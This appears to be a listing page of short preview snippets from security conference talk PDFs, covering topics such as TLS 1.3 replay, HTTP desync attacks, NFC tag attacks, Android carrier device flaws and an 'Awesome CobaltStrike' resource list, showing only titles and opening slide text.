KCon KCon 探索虚拟化技术在漏洞检测中的应用 By:仙果 PART 01 自我介绍 PART 02 困境的“城内和城外” PART 03 VT VS Exploit PART 04 攻防技术对抗 PART 05 结语 目录 CONTENTS 自我介绍 01 高级安全工程师 仙果 安全研究员 准爸爸 我 是 谁 ? 看雪学院 02 困境的“城内和城外” 困境 针对性的检测漏洞攻击 时间和效率的考量 人工分析的难度较大 人才培养周期长 攻防对抗成本显著增加 虚拟化技术应用于漏洞攻防对抗 精确对抗漏洞攻击 节省人力成本 虚拟化(Virtualization) 更多的时间在技术研究上 Virtualzation Hardware ...
pdf
Vulnerable Out of the Box: An Evaluation of Android Carrier Devices Ryan Johnson - Kryptowire Angelos Stavrou - Kryptowire Why Look for Cyber Threats? Aggressive data collection – Exfiltration of sensitive user-data to China (Adups) – Sensitive data collection (OnePlus 5) Remote system compromise – System compromise f...
pdf
PLAYBACK: A TLS 1.3 STORY WHO ARE WE? Alfonso García Alguacil Alejo Murillo Moya INTRODUCING TLS 1.3 The Good • KISS – Only 5 ciphers supported INTRODUCING TLS 1.3 The Good • No vulnerable to the attacks impacting previous versions INTRODUCING TLS 1.3 The Good • Welcome Forward Secrecy INTRODUCING TLS 1.3 The Good • F...
pdf
PLAYBACK: A TLS 1.3 STORY WHO ARE WE? Alfonso García Alguacil Alejo Murillo Moya INTRODUCING TLS 1.3 The Good • KISS – Only 5 ciphers supported INTRODUCING TLS 1.3 The Good • No vulnerable to the attacks impacting previous versions INTRODUCING TLS 1.3 The Good • Welcome Forward Secrecy INTRODUCING TLS 1.3 The Good • F...
pdf
对抗实践 目录 01 终端风控的对抗体系 02 设备指纹的对抗之道 03 设备指纹的对抗实践 04 合规挑战的适应应对 01终端风控 对抗体系 设备 指纹 智能 验证 生物探针 行为 分析 应用 加固 安全管控 终端风控态势感知系统 机器学习平台 反欺诈模型 01终端风控 风险对抗 设备 指纹 智能 验证 生物探针 行为 分析 应用 加固 安全管控 唯一 标识 模拟 器 设备 篡改 设备 伪造 群控 识别 人机 识别 本人 识别 人机 验证 机刷 对抗 黑产 工具 刷机 抹机 联防 联控 异常 行为 风险 行为 敏感 权限 隐私 数据 网络 行为 动态 加载 应用 保护 文件 保护 代码 保护 文件 操作 合规 检测 数据 加密 ...
pdf
fofahub - 1 标签 地址 新增属性 fofahub 未开源 https://hub.fofa.info/ 因为⾃⼰想做个 bugbounty 资产平台,所以体验了下 fofahub,记录些觉得不错的⽅式。 体验 新建项⽬ ( 图标好像是⾃动选取资产范围内的图标) 资产导⼊ 输⼊范围域名后它能返回资产信息 (可能是根据 fofa 结果筛选) fofahub - 2 分析⻚⾯ fofahub - 3 ⽐较好的点是能通过分析⻚⾯的结果添加更多资产到“资产追踪”中。例如从证书主域名中添加更多域名,从根域名中添加域名。 点击⼀些详情后,会使⽤搜索语法到资产列表搜索 资产列表是以 ip 为维度,⼦域名什么的都是根据 ip 来的,这样显...
pdf
NETWORK FLOW ANALYSIS DefCon 2008 Bruce Potter gdead@shmoo.com bpotter@pontetec.com Copyright 2008 - Bruce Potter INTRODUCTIONS   Bruce Potter   Founder of Ponte Technologies   Focus on advanced defensive technologies   Founder of The Shmoo Group   We run ShmooCon as well as other events   Co-author ...
pdf
Hacking Humanity: Human Augmentation And You quaddi & r3plicant Rio Hotel & Casino July 2012 Who We Are. Who We Are Not. •  Doctors •  Your Doctors WARNINGS • This talk does not constitute medical advice. • Technologies & research described are purely experimental and dangerous. • DO NOT ATTEMPT ANY MODI...
pdf
HTTP DESYNC ATTACKS SMASHING INTO THE CELL NEXT DOOR James Kettle The Fear Theory Q) What topic am I really scared of? A) HTTP Request Smuggling Hiding Wookiees in HTTP First documented by Watchfire in 2005 "You will not earn bounties" "You will certainly not be considered like a white hat" • Theory & Methodology • Ex...
pdf
Tag-side attacks against NFC What is NFC? Contactless communication between two devices in close proximity Many uses, primarily door controls and payment systems Why attack NFC? Interesting technology Low-level analysis tools can be prohibitively expensive Known to be insecure, but still widely used ISO-14443 Focuses...
pdf
The Death Envelope: A Medieval Solution to a 21st Century Problem Matt Yoder August 8-10, 2008, Las Vegas, Nevada Who am I? • Matt Yoder, acronym@acrønym.com • Mostly a guy who believes in the concept, and wants to spread the word. • Made a promise to a friend, that if I couldn’t find a good resource, I’d make it. • I’...
pdf
© The USA PATRIOT Act and You: A Legal Update  Jennifer Stisa Granick, Esq.  Stanford Law School  Center for Internet & Society  559 Nathan Abbott Way  Stanford, CA 94305  650-724-0014  jennifer@granick.com What Can I Do?  Lobbying Works: Call or Write Your Congressperson  Get Educated  American Civil Libert...
pdf
Quick Start For Cluster Node Servers Important hardware and safety information and guide to server documentation Xserve 3 1 Overview of Xserve Hardware, Setup, and Safety This booklet provides an illustrated reference for your Xserve hardware and an orientation to unpacking, setting up, and using your server. Use it ...
pdf
Awesome CobaltStrike awesome awesome cobaltstrike cobaltstrike awesome awesome community community Contents 0x00 Introduction 0x01 Articles & Videos 1. Basic Knowledge 2. Crack and Customisation 3. Useful Trick 4. CobaltStrike Hide 5. CobaltStrike Analysis 6. CobaltStrike Video 0x02 C2 Profiles 0x03 BOF 0x04 Aggres...
pdf